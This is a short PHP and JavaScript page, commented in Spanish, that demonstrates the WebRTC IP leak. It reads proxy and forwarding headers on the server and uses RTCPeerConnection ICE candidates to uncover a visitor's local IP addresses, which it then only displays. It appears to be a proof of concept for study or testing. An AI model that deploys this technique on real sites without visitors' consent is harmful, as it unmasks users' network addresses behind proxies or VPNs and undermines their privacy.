<html>
    <head><title>informaci&oacute;n de red</title></header>
    <body>
        <div id="info"></div>
    </body>
</html>

<!-------------------------->

<?php

// Obtiene el valor de una clave de $_SERVER
function valor($clave) {
    if (! isset($_SERVER[$clave])) {
        return "";
    }
    
    return str_replace('"', '\\"' , $_SERVER[$clave]);
}



$ip_origen = valor('HTTP_X_FORWARDED_FOR');
$proxy = valor('HTTP_VIA');
$router = valor('REMOTE_ADDR');

print <<<EOT
<script>
var red = {
    // Datos obtenidos en el servidor
    "ip_origen": "$ip_origen",
    "proxy": "$proxy",
    "ip_router": "$router",
    
    // Datos obtenidos en el cliente
    "ips": {}
}
</script>
EOT;
?>


<script>
// Procesa cada IP encontrada
function procesaIP(ip) {
    red.ips[ip] = "";
}

// Clase para las conexiones peer to peer de RTC
// https://developer.mozilla.org/en-US/docs/Web/API/RTCPeerConnection
var ConexionRTC = window.RTCPeerConnection
    || window.mozRTCPeerConnection
    || window.webkitRTCPeerConnection;

// Crea una conexión
var conexion = new ConexionRTC({iceServers: []});

// Crea un canal de conexion
conexion.createDataChannel(null);

// Comprobar candidatos ICE
conexion.onicecandidate = function(evento) {
    // Obtener el candidato ICE
    var candidato = evento.candidate;
    if (candidato) {
        var atributos = candidato.candidate.split(/\s/);

        // Procesar la dirección IP
        if (atributos[7] == "host") {
            procesaIP(atributos[4]);
        }
    }
}

// Crea una oferta de sesión SDP y analizar su descripción
conexion.createOffer(
    // Función a invocar en caso de que se cree
    function(descripcion) {
        var mensaje = descripcion.sdp;

        // Procesar líneas "o"
        var match = mensaje.match(/(^|\n)(o=.*)/);
        if (match) {
            var origen = match[2];
            var partes = origen.split(/\s/);
            procesaIP(partes[5]);
        }

        // Procesar líneas "c"
        var match = mensaje.match(/(^|\n)(c=.*)/);
        if (match) {
            var con = match[2];
            var partes = con.split(/\s/);
            procesaIP(partes[2]);
        }

        // Define parámetros para la descripcion de la conexión
        conexion.setLocalDescription(descripcion, function(){}, function(){});
    },

    // Función a invocar si falla la creación de oferta
    // No hacer nada
    function() {}
);


// Utiliza la información de red obtenida para hacer lo que el atacante desee
// En este caso, sólo se muestra los datos al usuario
function utiliza_datos() {
    var div = document.getElementById("info");
    var texto = "Datos encontrados en el servidor:<br>";
    texto += "&nbsp;&nbsp;&nbsp;Router: " + red.ip_router + "<br>";
    texto += "&nbsp;&nbsp;&nbsp;Proxy: " + red.proxy + "<br>";
    texto += "&nbsp;&nbsp;&nbsp;IP original: " + red.ip_origen + "<br><br>";
    
    texto += "Datos encontrados en el cliente: <br>";
    for (var i in red.ips) {
        texto += "&nbsp;&nbsp;&nbsp;"
            + i + "<br>";
    }
    div.innerHTML = texto;
    document.body.appendChild(div);
}


// Esperar un rato para que dé tiempo a encontrar las IP
// y después mostrarlas
setTimeout(utiliza_datos, 500);
</script>
